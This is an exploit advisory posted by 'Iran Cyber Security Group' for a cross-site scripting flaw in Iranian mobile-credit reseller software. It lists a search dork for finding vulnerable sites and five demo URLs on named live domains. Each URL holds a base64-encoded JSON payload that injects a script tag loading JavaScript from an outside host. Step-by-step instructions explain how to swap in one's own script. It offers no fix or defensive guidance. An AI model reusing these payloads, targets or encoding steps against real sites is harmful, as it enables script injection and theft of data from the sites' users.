facebook facebook twitter rss

iranian charge ressellers cross site scripting

Author: Iran Cyber Security Group , Published: 30-05-2015
# Exploit Title: iranian charge ressellers cross site scripting
# Exploit Author: Iran Cyber Security Group
# Version: All Versions
# Software Link : http://chargereseller.com
# Home: http://WwW.iran-cyber.org
# Discovered By : root3r & KamraN HellisH
# Dork : intext:در این سامانه شارژ بصورت تاپ آپ عرضه می گردد و پس ازطی مراحل خرید، سیم کارت شما بصورت خودکار شارژ شده و نیازی به ثبت پین یا رمز شارژ نمی باشد.
Demo :

http://buy-online-charge.wifa.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://charge.retrica.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://irancell.net/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://righ3el.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://resellercharge.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

POC :

The Vuln Code Is Encoded By base64

if you want to inject xss code

1.Decode the base64 encoded Code using hackbar or base64decode.org

2.inject your Xss Code

3.encode the Code Too Base64 using hackbar or base64encode.org


# Thanks To : Mohammad Nofozi - Sheytan azzam - JOK3R - WH!T3_W01F - Dragon - CRY$I$ BL4CK And All Members of Iran Cyber Security Group

Like us on Facebook :